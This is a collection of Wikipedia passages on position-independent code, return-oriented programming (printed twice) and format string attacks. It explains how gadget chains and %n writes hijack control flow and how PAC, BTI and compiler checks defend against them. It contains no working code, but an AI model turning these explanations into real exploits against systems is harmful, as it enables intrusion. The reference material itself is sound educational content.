the offset does not need to be changed depending on the address at which the position-independent code is loaded. An instruction that fetches the GOT entry for a global variable would use anaddressing modethat contains an offset relative to some instruction in the code; this might be aPC-relativeaddressing mode if theinstruction set architecturesupports it, or aregister-relativeaddressing mode, with functions loading that register with the address of an instruction in thefunction prologue.[8][9][10][11] Dynamic-link libraries(DLLs) inMicrosoft Windowsuse variant E8 of the CALL instruction (Call near, relative, displacement relative to next instruction). These instructions do not need modification when the DLL is loaded. Some global variables (e.g. arrays of string literals, virtual function tables) are expected to contain an address of an object in data section respectively in code section of the dynamic library; therefore, the stored address in the global variable must be updated to reflect the address where the DLL was loaded to. The dynamic loader calculates the address referred to by a global variable and stores the value in such global variable; this triggers copy-on-write of a memory page containing such global variable. Pages with code and pages with global variables that do not contain pointers to code or global data remain shared between processes. This operation must be done in any OS that can load a dynamic library at arbitrary address. In Windows Vista and later versions of Windows, therelocationof DLLs and executables is done by the kernel memory manager, which shares the relocated binaries across multiple processes. Images are always relocated from their preferred base addresses, achievingaddress space layout randomization(ASLR).[12] Versions of Windows prior to Vista require that system DLLs beprelinkedat non-conflicting fixed addresses at the link time in order to avoid runtime relocation of images. Runtime relocation in these older versions of Windows is performed by the DLL loader within the context of each process, and the resulting relocated portions of each image can no longer be shared between processes. The handling of DLLs in Windows differs from the earlierOS/2procedure it derives from. OS/2 presents a third alternative and attempts to load DLLs that are not position-independent into a dedicated "shared arena" in memory, and maps them once they are loaded. All users of the DLL are able to use the same in-memory copy. InMulticseach procedure conceptually[d]has a code segment and a linkage segment.[13][14]The code segment contains only code and the linkage section serves as a template for a new linkage segment. Pointer register 4 (PR4) points to the linkage segment of the procedure. A call to a procedure saves PR4 in the stack before loading it with a pointer to the callee's linkage segment. The procedure call uses an indirect pointer pair[15]with a flag to cause a trap on the first call so that the dynamic linkage mechanism can add the new procedure and its linkage segment to the Known Segment Table (KST), construct a new linkage segment, put their segment numbers in the caller's linkage section and reset the flag in the indirect pointer pair. In IBM S/360 Time Sharing System (TSS/360 and TSS/370) each procedure may have a read-only public CSECT and a writable private Prototype Section (PSECT). A caller loads a V-constant for the routine into General Register 15 (GR15) and copies an R-constant for the routine's PSECT into the 19th word of the save area pointed to be GR13.[16] The Dynamic Loader[17]does not load program pages or resolve address constants until the first page fault. Position-independent executables(PIE) are executable binaries made entirely from position-independent code. While some systems only run PIC executables, there are other reasons they are used. PIE binaries are used in somesecurity-focusedLinuxdistributions to allowPaXorExec Shieldto useaddress space layout randomization(ASLR) to prevent attackers from knowing where existing executable code is during a security attack usingexploitsthat rely on knowing the offset of the executable code in the binary, such asreturn-to-libc attacks. (The official Linux kernel since 2.6.12 of 2005 has a weaker ASLR that also works with PIE. It is weak in that randomness is applied to whole ELF file units.)[18] Apple'smacOSandiOSfully support PIE executables as of versions 10.7 and 4.3, respectively; a warning is issued when non-PIE iOS executables are submitted for approval to Apple's App Store but there's no hard requirement yet[when?]and non-PIE applications are not rejected.[19][20] OpenBSDhas PIE enabled by default on most architectures since OpenBSD 5.3, released on 1 May 2013.[21]Support for PIE instatically linkedbinaries, such as the executables in/binand/sbindirectories, was added near the end of 2014.[22]openSUSE added PIE as a default in 2015-02. Beginning withFedora23, Fedora maintainers decided to build packages with PIE enabled as the default.[23]Ubuntu17.10has PIE enabled by default across all architectures.[24]Gentoo's new profiles now support PIE by default.[25]Around July 2017,Debianenabled PIE by default.[26] Androidenabled support for PIEs inJelly Bean[27]and removed non-PIE linker support inLollipop.[28]
https://en.wikipedia.org/wiki/Position-independent_code
Return-oriented programming(ROP) is acomputer security exploittechnique that allows an attacker to execute code in the presence of security defenses[1][2]such asexecutable-space protectionandcode signing.[3] In this technique, an attacker gains control of thecall stackto hijack programcontrol flowand then executes carefully chosenmachine instructionsequences that are already present in the machine's memory, called "gadgets".[4][nb 1]Each gadget typically ends in areturn instructionand is located in asubroutinewithin the existing program and/or shared library code.[nb 1]Chained together, these gadgets allow an attacker to perform arbitrary operations on a machine employing defenses that thwart simpler attacks. Return-oriented programming is an advanced version of astack smashingattack. Generally, these types of attacks arise when an adversary manipulates thecall stackby taking advantage of abugin the program, often abuffer overrun. In a buffer overrun, a function that does not perform properbounds checkingbefore storing user-provided data into memory will accept more input data than it can store properly. If the data is being written onto the stack, the excess data may overflow the space allocated to the function's variables (e.g., "locals" in the stack diagram to the right) and overwrite the return address. This address will later be used by the function to redirect control flow back to thecaller. If it has been overwritten, control flow will be diverted to the location specified by the new return address. In a standard buffer overrun attack, the attacker would simplywrite attack code(the "payload") onto the stack and then overwrite the return address with the location of these newly written instructions. Until the late 1990s, majoroperating systemsdid not offer any protection against these attacks;Microsoft Windowsprovided no buffer-overrun protections until 2004.[5]Eventually, operating systems began to combat the exploitation of buffer overflow bugs by marking the memory where data is written as non-executable, a technique known asexecutable-space protection. With this enabled, the machine would refuse to execute any code located in user-writable areas of memory, preventing the attacker from placing payload on the stack and jumping to it via a return address overwrite.Hardware supportlater became available to strengthen this protection. With data execution prevention, an adversary cannot directly execute instructions written to a buffer because the buffer's memory section is marked as non-executable. To defeat this protection, a return-oriented programming attack does not inject malicious instructions, but rather uses instruction sequences already present in executable memory, called "gadgets", by manipulating return addresses. A typical data execution prevention implementation cannot defend against this attack because the adversary did not directly execute the malicious code, but rather combined sequences of "good" instructions by changing stored return addresses; therefore the code used would be marked as executable. The widespread implementation of data execution prevention made traditional buffer overflow vulnerabilities difficult or impossible to exploit in the manner described above. Instead, an attacker was restricted to code already in memory marked executable, such as the program code itself and any linkedshared libraries. Since shared libraries, such aslibc, often contain subroutines for performing system calls and other functionality potentially useful to an attacker, they are the most likely candidates for finding code to assemble an attack. In a return-into-library attack, an attacker hijacks program control flow by exploiting a buffer overrun vulnerability, exactly as discussed above. Instead of attempting to write an attack payload onto the stack, the attacker instead chooses an available library function and overwrites the return address with its entry location. Further stack locations are then overwritten, obeying applicablecalling conventions, to carefully pass the proper parameters to the function so it performs functionality useful to the attacker. This technique was first presented bySolar Designerin 1997,[6]and was later extended to unlimited chaining of function calls.[7] The rise of64-bit x86processors brought with it a change to the subroutine calling convention that required the first few arguments to a function to be passed inregistersinstead of on the stack. This meant that an attacker could no longer set up a library function call with desired arguments just by manipulating the call stack via a buffer overrun exploit. Shared library developers also began to remove or restrict library functions that performed actions particularly useful to an attacker, such assystem callwrappers. As a result, return-into-library attacks became much more difficult to mount successfully. The next evolution came in the form of an attack that used chunks of library functions, instead of entire functions themselves, to exploit buffer overrun vulnerabilities on machines with defenses against simpler attacks.[8]This technique looks for functions that contain instruction sequences that pop values from the stack into registers. Careful selection of these code sequences allows an attacker to put suitable values into the proper registers to perform a function call under the new calling convention. The rest of the attack proceeds as a return-into-library attack. Return-oriented programming builds on the borrowed code chunks approach and extends it to provideTuring-completefunctionality to the attacker, includingloopsandconditional branches.[9][10]Put another way, return-oriented programming provides a fully functional "language" that an attacker can use to make a compromised machine perform any operation desired.Hovav Shachampublished the technique in 2007[11]and demonstrated how all the important programming constructs can be simulated using return-oriented programming against a target application linked with the C standard library and containing an exploitable buffer overrun vulnerability. A return-oriented programming attack is superior to the other attack types discussed, both in expressive power and in resistance to defensive measures. None of the counter-exploitation techniques mentioned above, including removing potentially dangerous functions from shared libraries altogether, are effective against a return-oriented programming attack. Although return-oriented programming attacks can be performed on a variety of architectures,[11]Shacham's paper and the majority of follow-up work focus on the Intelx86architecture. The x86 architecture is a variable-lengthCISCinstruction set. Return-oriented programming on the x86 takes advantage of the fact that the instruction set is very "dense", that is, any random sequence of bytes is likely to be interpretable as some valid set of x86 instructions. It is therefore possible to search for anopcodethat alters control flow, most notably the return instruction (0xC3) and then look backwards in the binary for preceding bytes that form possibly useful instructions. These sets of instruction "gadgets" can then be chained by overwriting the return address, via a buffer overrun exploit, with the address of the first instruction of the first gadget. The first address of subsequent gadgets is then written successively onto the stack. At the conclusion of the first gadget, a return instruction will be executed, which will pop the address of the next gadget off the stack and jump to it. At the conclusion of that gadget, the chain continues with the third, and so on. By chaining the small instruction sequences, an attacker is able to produce arbitrary program behavior from pre-existing library code. Shacham asserts that given any sufficiently large quantity of code (including, but not limited to, the C standard library), sufficient gadgets will exist for Turing-complete functionality.[11] An automated tool has been developed to help automate the process of locating gadgets and constructing an attack against a binary.[12]This tool, known as ROPgadget, searches through a binary looking for potentially useful gadgets, and attempts to assemble them into an attack payload that spawns a shell to accept arbitrary commands from the attacker. Theaddress space layout randomizationalso has vulnerabilities. According to the paper of Shacham et al.,[13]the ASLR on 32-bit architectures is limited by the number of bits available for address randomization. Only 16 of the 32 address bits are available for randomization, and 16 bits of address randomization can be defeated by brute force attack in minutes. 64-bit architectures are more robust, with 40 of the 64 bits available for randomization. A brute force attack against 40-bit randomization is possible, but is unlikely to go unnoticed.[citation needed]In addition to brute force attacks, techniques forremoving randomizationexist. Even with perfect randomization, if there is any information leakage of memory contents it would help to calculate the base address of for example ashared libraryat runtime.[14] According to the paper of Checkoway et al.,[15]it is possible to perform return-oriented-programming on x86 and ARM architectures without using a return instruction (0xC3 on x86). They instead used carefully crafted instruction sequences that already exist in the machine's memory to behave like a return instruction. A return instruction has two effects: firstly, it reads the four-byte value at the top of the stack, and sets the instruction pointer to that value, and secondly, it increases the stack pointer value by four (equivalent to a pop operation). On the x86 architecture, sequences of jmp and pop instructions can act as a return instruction. On ARM, sequences of load and branch instructions can act as a return instruction. Since this new approach does not use a return instruction, it has negative implications for defense. When a defense program checks not only for several returns but also for several jump instructions, this attack may be detected. The G-Free technique was developed by Kaan Onarlioglu, Leyla Bilge, Andrea Lanzi, Davide Balzarotti, and Engin Kirda. It is a practical solution against any possible form of return-oriented programming. The solution eliminates all unaligned free-branch instructions (instructions like RET or CALL which attackers can use tochange controlflow) inside a binary executable, and protects the free-branch instructions from being used by an attacker. The way G-Free protects the return address is similar to theXOR canaryimplemented by StackGuard. Further, it checks the authenticity of function calls by appending a validation block. If the expected result is not found, G-Free causes the application to crash.[16] A number of techniques have been proposed to subvert attacks based on return-oriented programming.[17]Most rely on randomizing the location of program and library code, so that an attacker cannot accurately predict the location of instructions that might be useful in gadgets and therefore cannot mount a successful return-oriented programming attack chain. One fairly common implementation of this technique,address space layout randomization(ASLR), loads shared libraries into a different memory location at each program load. Although widely deployed by modern operating systems, ASLR is vulnerable toinformation leakageattacks and other approaches to determine the address of any known library function in memory. If an attacker can successfully determine the location of one known instruction, the position of all others can be inferred and a return-oriented programming attack can be constructed. This randomization approach can be taken further by relocating all the instructions and/or other program state (registers and stack objects) of the program separately, instead of just library locations.[18][19][20]This requires extensive runtime support, such as a software dynamic translator, to piece the randomized instructions back together at runtime. This technique is successful at making gadgets difficult to find and utilize, but comes with significant overhead. Another approach, taken by kBouncer, modifies the operating system to verify that return instructions actually divert control flow back to a location immediately following a call instruction. This prevents gadget chaining, but carries a heavy performance penalty,[clarification needed]and is not effective against jump-oriented programming attacks which alter jumps and other control-flow-modifying instructions instead of returns.[21] Some modern systems such as Cloud Lambda (FaaS) and IoT remote updates use Cloud infrastructure to perform on-the-fly compilation beforesoftware deployment. A technique that introduces variations to each instance of an executing software program can dramatically increase software's immunity to ROP attacks. Brute forcing Cloud Lambda may result in attacking several instances of the randomized software which reduces the effectiveness of the attack. Asaf Shelly published the technique in 2017[22]and demonstrated the use of Binary Randomization in a software update system. For every updated device, the Cloud-based service introduced variations to code, performs online compilation, and dispatched the binary. This technique is very effective because ROP attacks rely on knowledge of the internal structure of the software. The drawback of the technique is that the software is never fully tested before it is deployed because it is not feasible to test all variations of the randomized software. This means that many Binary Randomization techniques are applicable for network interfaces and system programming and are less recommended for complex algorithms. Structured Exception HandlerOverwrite Protection is a feature of Windows which protects against the most common stack overflow attacks, especially against attacks on a structured exception handler. As small embedded systems are proliferating due to the expansion of theInternet Of Things, the need for protection of such embedded systems is also increasing. Using Instruction Based Memory Access Control (IB-MAC) implemented in hardware, it is possible to protect low-cost embedded systems against malicious control flow and stack overflow attacks. The protection can be provided by separating the data stack and the return stack. However, due to the lack of amemory management unitin some embedded systems, the hardware solution cannot be applied to all embedded systems.[23] In 2010, Jinku Li et al. proposed[24]that a suitably modified compiler could eliminate return-oriented "gadgets" by replacing eachcallfwith the instruction sequencepushl$index;jmpfand eachretwith the instruction sequencepopl%reg;jmptable(%reg), wheretablerepresents an immutable tabulation of all "legitimate" return addresses in the program andindexrepresents a specific index into that table.[24]: 5–6This prevents the creation of a return-oriented gadget that returns straight from the end of a function to an arbitrary address in the middle of another function; instead, gadgets can return only to "legitimate" return addresses, which drastically increases the difficulty of creating useful gadgets. Li et al. claimed that "our return indirection technique essentiallyde-generalizesreturn-oriented programming back to the old style of return-into-libc."[24]Their proof-of-concept compiler included apeephole optimizationphase to deal with "certain machine instructions which happen to contain the return opcode in their opcodes or immediate operands,"[24]such asmovl$0xC3,%eax. The ARMv8.3-A architecture introduces a new feature at the hardware level that takes advantage of unused bits in the pointer address space to cryptographically sign pointer addresses using a specially-designedtweakable block cipher[25][26]which signs the desired value (typically, a return address) combined with a "local context" value (e.g., the stack pointer). Before performing a sensitive operation (i.e., returning to the saved pointer) the signature can be checked to detect tampering or usage in the incorrect context (e.g., leveraging a saved return address from an exploit trampoline context). Notably theApple A12chips used in iPhones have upgraded to ARMv8.3 and use PACs.Linuxgained support for pointer authentication within the kernel in version 5.7 released in 2020; support foruserspaceapplications was added in 2018.[27] In 2022, researchers at MIT published aside-channel attackagainst PACs dubbedPACMAN.[28] The ARMv8.5-A architecture introduces another new feature at the hardware level that explicitly identifies valid targets of branch instructions. The compiler inserts a special instruction, opcode named "BTI", at each expected landing point ofindirect branchinstructions. These identified branch destinations typically include function entry points and switch/case code blocks. BTI instructions are used in code memory pages which are marked as "guarded" by the compiler and the linker. Any indirect branch instruction landing, in a guarded page, at any instruction other than a BTI generates a fault. The identified destinations where a BTI instruction is inserted represent approximately 1% of all instructions in average application code. Therefore, using BTI increases the code size by the same amount.[29] The gadgets which are used in a ROP attack are located anywhere in the application code. Therefore, on average, 99% of the gadgets start with an instruction which is not a BTI.[citation needed]Branching to these gadgets consequently results in a fault. Considering that a ROP attack is made of a chain of multiple gadgets, the probability that all gadgets in a chain are part of the 1% which start with a BTI is very low. PAC and BTI are complementary mechanisms to prevent rogue code injections using return-oriented and jump-oriented programming attacks. While PAC focuses on the source of a branch operation (a signed pointer), BTI focuses on the destination of the branch.[30]
https://en.wikipedia.org/wiki/Return-oriented_programming
Return-oriented programming(ROP) is acomputer security exploittechnique that allows an attacker to execute code in the presence of security defenses[1][2]such asexecutable-space protectionandcode signing.[3] In this technique, an attacker gains control of thecall stackto hijack programcontrol flowand then executes carefully chosenmachine instructionsequences that are already present in the machine's memory, called "gadgets".[4][nb 1]Each gadget typically ends in areturn instructionand is located in asubroutinewithin the existing program and/or shared library code.[nb 1]Chained together, these gadgets allow an attacker to perform arbitrary operations on a machine employing defenses that thwart simpler attacks. Return-oriented programming is an advanced version of astack smashingattack. Generally, these types of attacks arise when an adversary manipulates thecall stackby taking advantage of abugin the program, often abuffer overrun. In a buffer overrun, a function that does not perform properbounds checkingbefore storing user-provided data into memory will accept more input data than it can store properly. If the data is being written onto the stack, the excess data may overflow the space allocated to the function's variables (e.g., "locals" in the stack diagram to the right) and overwrite the return address. This address will later be used by the function to redirect control flow back to thecaller. If it has been overwritten, control flow will be diverted to the location specified by the new return address. In a standard buffer overrun attack, the attacker would simplywrite attack code(the "payload") onto the stack and then overwrite the return address with the location of these newly written instructions. Until the late 1990s, majoroperating systemsdid not offer any protection against these attacks;Microsoft Windowsprovided no buffer-overrun protections until 2004.[5]Eventually, operating systems began to combat the exploitation of buffer overflow bugs by marking the memory where data is written as non-executable, a technique known asexecutable-space protection. With this enabled, the machine would refuse to execute any code located in user-writable areas of memory, preventing the attacker from placing payload on the stack and jumping to it via a return address overwrite.Hardware supportlater became available to strengthen this protection. With data execution prevention, an adversary cannot directly execute instructions written to a buffer because the buffer's memory section is marked as non-executable. To defeat this protection, a return-oriented programming attack does not inject malicious instructions, but rather uses instruction sequences already present in executable memory, called "gadgets", by manipulating return addresses. A typical data execution prevention implementation cannot defend against this attack because the adversary did not directly execute the malicious code, but rather combined sequences of "good" instructions by changing stored return addresses; therefore the code used would be marked as executable. The widespread implementation of data execution prevention made traditional buffer overflow vulnerabilities difficult or impossible to exploit in the manner described above. Instead, an attacker was restricted to code already in memory marked executable, such as the program code itself and any linkedshared libraries. Since shared libraries, such aslibc, often contain subroutines for performing system calls and other functionality potentially useful to an attacker, they are the most likely candidates for finding code to assemble an attack. In a return-into-library attack, an attacker hijacks program control flow by exploiting a buffer overrun vulnerability, exactly as discussed above. Instead of attempting to write an attack payload onto the stack, the attacker instead chooses an available library function and overwrites the return address with its entry location. Further stack locations are then overwritten, obeying applicablecalling conventions, to carefully pass the proper parameters to the function so it performs functionality useful to the attacker. This technique was first presented bySolar Designerin 1997,[6]and was later extended to unlimited chaining of function calls.[7] The rise of64-bit x86processors brought with it a change to the subroutine calling convention that required the first few arguments to a function to be passed inregistersinstead of on the stack. This meant that an attacker could no longer set up a library function call with desired arguments just by manipulating the call stack via a buffer overrun exploit. Shared library developers also began to remove or restrict library functions that performed actions particularly useful to an attacker, such assystem callwrappers. As a result, return-into-library attacks became much more difficult to mount successfully. The next evolution came in the form of an attack that used chunks of library functions, instead of entire functions themselves, to exploit buffer overrun vulnerabilities on machines with defenses against simpler attacks.[8]This technique looks for functions that contain instruction sequences that pop values from the stack into registers. Careful selection of these code sequences allows an attacker to put suitable values into the proper registers to perform a function call under the new calling convention. The rest of the attack proceeds as a return-into-library attack. Return-oriented programming builds on the borrowed code chunks approach and extends it to provideTuring-completefunctionality to the attacker, includingloopsandconditional branches.[9][10]Put another way, return-oriented programming provides a fully functional "language" that an attacker can use to make a compromised machine perform any operation desired.Hovav Shachampublished the technique in 2007[11]and demonstrated how all the important programming constructs can be simulated using return-oriented programming against a target application linked with the C standard library and containing an exploitable buffer overrun vulnerability. A return-oriented programming attack is superior to the other attack types discussed, both in expressive power and in resistance to defensive measures. None of the counter-exploitation techniques mentioned above, including removing potentially dangerous functions from shared libraries altogether, are effective against a return-oriented programming attack. Although return-oriented programming attacks can be performed on a variety of architectures,[11]Shacham's paper and the majority of follow-up work focus on the Intelx86architecture. The x86 architecture is a variable-lengthCISCinstruction set. Return-oriented programming on the x86 takes advantage of the fact that the instruction set is very "dense", that is, any random sequence of bytes is likely to be interpretable as some valid set of x86 instructions. It is therefore possible to search for anopcodethat alters control flow, most notably the return instruction (0xC3) and then look backwards in the binary for preceding bytes that form possibly useful instructions. These sets of instruction "gadgets" can then be chained by overwriting the return address, via a buffer overrun exploit, with the address of the first instruction of the first gadget. The first address of subsequent gadgets is then written successively onto the stack. At the conclusion of the first gadget, a return instruction will be executed, which will pop the address of the next gadget off the stack and jump to it. At the conclusion of that gadget, the chain continues with the third, and so on. By chaining the small instruction sequences, an attacker is able to produce arbitrary program behavior from pre-existing library code. Shacham asserts that given any sufficiently large quantity of code (including, but not limited to, the C standard library), sufficient gadgets will exist for Turing-complete functionality.[11] An automated tool has been developed to help automate the process of locating gadgets and constructing an attack against a binary.[12]This tool, known as ROPgadget, searches through a binary looking for potentially useful gadgets, and attempts to assemble them into an attack payload that spawns a shell to accept arbitrary commands from the attacker. Theaddress space layout randomizationalso has vulnerabilities. According to the paper of Shacham et al.,[13]the ASLR on 32-bit architectures is limited by the number of bits available for address randomization. Only 16 of the 32 address bits are available for randomization, and 16 bits of address randomization can be defeated by brute force attack in minutes. 64-bit architectures are more robust, with 40 of the 64 bits available for randomization. A brute force attack against 40-bit randomization is possible, but is unlikely to go unnoticed.[citation needed]In addition to brute force attacks, techniques forremoving randomizationexist. Even with perfect randomization, if there is any information leakage of memory contents it would help to calculate the base address of for example ashared libraryat runtime.[14] According to the paper of Checkoway et al.,[15]it is possible to perform return-oriented-programming on x86 and ARM architectures without using a return instruction (0xC3 on x86). They instead used carefully crafted instruction sequences that already exist in the machine's memory to behave like a return instruction. A return instruction has two effects: firstly, it reads the four-byte value at the top of the stack, and sets the instruction pointer to that value, and secondly, it increases the stack pointer value by four (equivalent to a pop operation). On the x86 architecture, sequences of jmp and pop instructions can act as a return instruction. On ARM, sequences of load and branch instructions can act as a return instruction. Since this new approach does not use a return instruction, it has negative implications for defense. When a defense program checks not only for several returns but also for several jump instructions, this attack may be detected. The G-Free technique was developed by Kaan Onarlioglu, Leyla Bilge, Andrea Lanzi, Davide Balzarotti, and Engin Kirda. It is a practical solution against any possible form of return-oriented programming. The solution eliminates all unaligned free-branch instructions (instructions like RET or CALL which attackers can use tochange controlflow) inside a binary executable, and protects the free-branch instructions from being used by an attacker. The way G-Free protects the return address is similar to theXOR canaryimplemented by StackGuard. Further, it checks the authenticity of function calls by appending a validation block. If the expected result is not found, G-Free causes the application to crash.[16] A number of techniques have been proposed to subvert attacks based on return-oriented programming.[17]Most rely on randomizing the location of program and library code, so that an attacker cannot accurately predict the location of instructions that might be useful in gadgets and therefore cannot mount a successful return-oriented programming attack chain. One fairly common implementation of this technique,address space layout randomization(ASLR), loads shared libraries into a different memory location at each program load. Although widely deployed by modern operating systems, ASLR is vulnerable toinformation leakageattacks and other approaches to determine the address of any known library function in memory. If an attacker can successfully determine the location of one known instruction, the position of all others can be inferred and a return-oriented programming attack can be constructed. This randomization approach can be taken further by relocating all the instructions and/or other program state (registers and stack objects) of the program separately, instead of just library locations.[18][19][20]This requires extensive runtime support, such as a software dynamic translator, to piece the randomized instructions back together at runtime. This technique is successful at making gadgets difficult to find and utilize, but comes with significant overhead. Another approach, taken by kBouncer, modifies the operating system to verify that return instructions actually divert control flow back to a location immediately following a call instruction. This prevents gadget chaining, but carries a heavy performance penalty,[clarification needed]and is not effective against jump-oriented programming attacks which alter jumps and other control-flow-modifying instructions instead of returns.[21] Some modern systems such as Cloud Lambda (FaaS) and IoT remote updates use Cloud infrastructure to perform on-the-fly compilation beforesoftware deployment. A technique that introduces variations to each instance of an executing software program can dramatically increase software's immunity to ROP attacks. Brute forcing Cloud Lambda may result in attacking several instances of the randomized software which reduces the effectiveness of the attack. Asaf Shelly published the technique in 2017[22]and demonstrated the use of Binary Randomization in a software update system. For every updated device, the Cloud-based service introduced variations to code, performs online compilation, and dispatched the binary. This technique is very effective because ROP attacks rely on knowledge of the internal structure of the software. The drawback of the technique is that the software is never fully tested before it is deployed because it is not feasible to test all variations of the randomized software. This means that many Binary Randomization techniques are applicable for network interfaces and system programming and are less recommended for complex algorithms. Structured Exception HandlerOverwrite Protection is a feature of Windows which protects against the most common stack overflow attacks, especially against attacks on a structured exception handler. As small embedded systems are proliferating due to the expansion of theInternet Of Things, the need for protection of such embedded systems is also increasing. Using Instruction Based Memory Access Control (IB-MAC) implemented in hardware, it is possible to protect low-cost embedded systems against malicious control flow and stack overflow attacks. The protection can be provided by separating the data stack and the return stack. However, due to the lack of amemory management unitin some embedded systems, the hardware solution cannot be applied to all embedded systems.[23] In 2010, Jinku Li et al. proposed[24]that a suitably modified compiler could eliminate return-oriented "gadgets" by replacing eachcallfwith the instruction sequencepushl$index;jmpfand eachretwith the instruction sequencepopl%reg;jmptable(%reg), wheretablerepresents an immutable tabulation of all "legitimate" return addresses in the program andindexrepresents a specific index into that table.[24]: 5–6This prevents the creation of a return-oriented gadget that returns straight from the end of a function to an arbitrary address in the middle of another function; instead, gadgets can return only to "legitimate" return addresses, which drastically increases the difficulty of creating useful gadgets. Li et al. claimed that "our return indirection technique essentiallyde-generalizesreturn-oriented programming back to the old style of return-into-libc."[24]Their proof-of-concept compiler included apeephole optimizationphase to deal with "certain machine instructions which happen to contain the return opcode in their opcodes or immediate operands,"[24]such asmovl$0xC3,%eax. The ARMv8.3-A architecture introduces a new feature at the hardware level that takes advantage of unused bits in the pointer address space to cryptographically sign pointer addresses using a specially-designedtweakable block cipher[25][26]which signs the desired value (typically, a return address) combined with a "local context" value (e.g., the stack pointer). Before performing a sensitive operation (i.e., returning to the saved pointer) the signature can be checked to detect tampering or usage in the incorrect context (e.g., leveraging a saved return address from an exploit trampoline context). Notably theApple A12chips used in iPhones have upgraded to ARMv8.3 and use PACs.Linuxgained support for pointer authentication within the kernel in version 5.7 released in 2020; support foruserspaceapplications was added in 2018.[27] In 2022, researchers at MIT published aside-channel attackagainst PACs dubbedPACMAN.[28] The ARMv8.5-A architecture introduces another new feature at the hardware level that explicitly identifies valid targets of branch instructions. The compiler inserts a special instruction, opcode named "BTI", at each expected landing point ofindirect branchinstructions. These identified branch destinations typically include function entry points and switch/case code blocks. BTI instructions are used in code memory pages which are marked as "guarded" by the compiler and the linker. Any indirect branch instruction landing, in a guarded page, at any instruction other than a BTI generates a fault. The identified destinations where a BTI instruction is inserted represent approximately 1% of all instructions in average application code. Therefore, using BTI increases the code size by the same amount.[29] The gadgets which are used in a ROP attack are located anywhere in the application code. Therefore, on average, 99% of the gadgets start with an instruction which is not a BTI.[citation needed]Branching to these gadgets consequently results in a fault. Considering that a ROP attack is made of a chain of multiple gadgets, the probability that all gadgets in a chain are part of the 1% which start with a BTI is very low. PAC and BTI are complementary mechanisms to prevent rogue code injections using return-oriented and jump-oriented programming attacks. While PAC focuses on the source of a branch operation (a signed pointer), BTI focuses on the destination of the branch.[30]
https://en.wikipedia.org/wiki/Jump-oriented_programming
Uncontrolled format stringis a type ofcode injectionvulnerabilitydiscovered around 1989 that can be used insecurity exploits.[1]Originally thought harmless, format string exploits can be used tocrasha program or to execute harmful code. The problem stems from the use ofunchecked user inputas theformat stringparameter in certainCfunctions that perform formatting, such asprintf(). A malicious user may use the%sand%xformat tokens, among others, to print data from thecall stackor possibly other locations in memory. One may also write arbitrary data to arbitrary locations using the%nformat token, which commandsprintf()and similar functions to write the number of bytes formatted to an address stored on the stack. A typical exploit uses a combination of these techniques to take control of theinstruction pointer(IP) of a process,[2]for example by forcing a program to overwrite the address of a library function or the return address on the stack with a pointer to some maliciousshellcode. The padding parameters to format specifiers are used to control the number of bytes output and the%xtoken is used to pop bytes from the stack until the beginning of the format string itself is reached. The start of the format string is crafted to contain the address that the%nformat token can then overwrite with the address of the malicious code to execute. This is a common vulnerability because format bugs were previously thought harmless and resulted in vulnerabilities in many common tools.MITRE'sCVEproject lists roughly 500 vulnerable programs as of June 2007, and a trend analysis ranks it the 9th most-reported vulnerability type between 2001 and 2006.[3] Format string bugs most commonly appear when a programmer wishes to output a string containing user supplied data (either to a file, to a buffer, or to the user). The programmer may mistakenly writeprintf(buffer)instead ofprintf("%s", buffer). The first version interpretsbufferas a format string, and parses any formatting instructions it may contain. The second version simply prints a string to the screen, as the programmer intended. Both versions behave identically in the absence of format specifiers in the string, which makes it easy for the mistake to go unnoticed by the developer. Format bugs arise because C's argument passing conventions are nottype-safe. In particular, thevarargsmechanism allowsfunctionsto accept any number of arguments (e.g.printf) by "popping" as manyargumentsoff thecall stackas they wish, trusting the early arguments to indicate how many additional arguments are to be popped, and of what types. Format string bugs can occur in other programming languages besides C, such as Perl, although they appear with less frequency and usually cannot be exploited to execute code of the attacker's choice.[4] Format bugs were first noted in 1989 by thefuzz testingwork done at the University of Wisconsin, which discovered an "interaction effect" in theC shell(csh) between itscommand historymechanism and an error routine that assumed safe string input.[5] The use of format string bugs as anattack vectorwas discovered in September 1999 byTymm Twillmanduring asecurity auditof theProFTPDdaemon.[6]The audit uncovered ansnprintfthat directly passed user-generated data without a format string. Extensive tests with contrived arguments to printf-style functions showed that use of this for privilege escalation was possible. This led to the first posting in September 1999 on theBugtraqmailing list regarding this class of vulnerabilities, including a basic exploit.[6]It was still several months, however, before the security community became aware of the full dangers of format string vulnerabilities as exploits for other software using this method began to surface. The first exploits that brought the issue to common awareness (by providing remote root access via code execution) were published simultaneously on theBugtraqlist in June 2000 byPrzemysław Frasunek[7]and a person using the nicknametf8.[8]They were shortly followed by an explanation, posted by a person using the nicknamelamagra.[9]"Format bugs" was posted to theBugtraqlist by Pascal Bouchareine in July 2000.[10]The seminal paper "Format String Attacks"[11]byTim Newshamwas published in September 2000 and other detailed technical explanation papers were published in September 2001 such asExploiting Format String Vulnerabilities, by teamTeso.[2] Many compilers can statically check format strings and produce warnings for dangerous or suspect formats. Inthe GNU Compiler Collection, the relevant compiler flags are,-Wall,-Wformat,-Wno-format-extra-args,-Wformat-security,-Wformat-nonliteral, and-Wformat=2.[12] Most of these are only useful for detecting bad format strings that are known at compile-time. If the format string may come from the user or from a source external to the application, the application must validate the format string before using it. Care must also be taken if the application generates or selects format strings on the fly. If the GNU C library is used, the-D_FORTIFY_SOURCE=2parameter can be used to detect certain types of attacks occurring at run-time. The-Wformat-nonliteralcheck is more stringent. Contrary to many other security issues, the root cause of format string vulnerabilities is relatively easy to detect in x86-compiled executables: Forprintf-family functions, proper use implies a separate argument for the format string and the arguments to be formatted. Faulty uses of such functions can be spotted by simply counting the number of arguments passed to the function; an "argument deficiency"[2]is then a strong indicator that the function was misused. Counting the number of arguments is often made easy on x86 due to a calling convention where the caller removes the arguments that were pushed onto the stack by adding to the stack pointer after the call, so a simple examination of the stack correction yields the number of arguments passed to theprintf-family function.'[2]
https://en.wikipedia.org/wiki/Format_string_attack
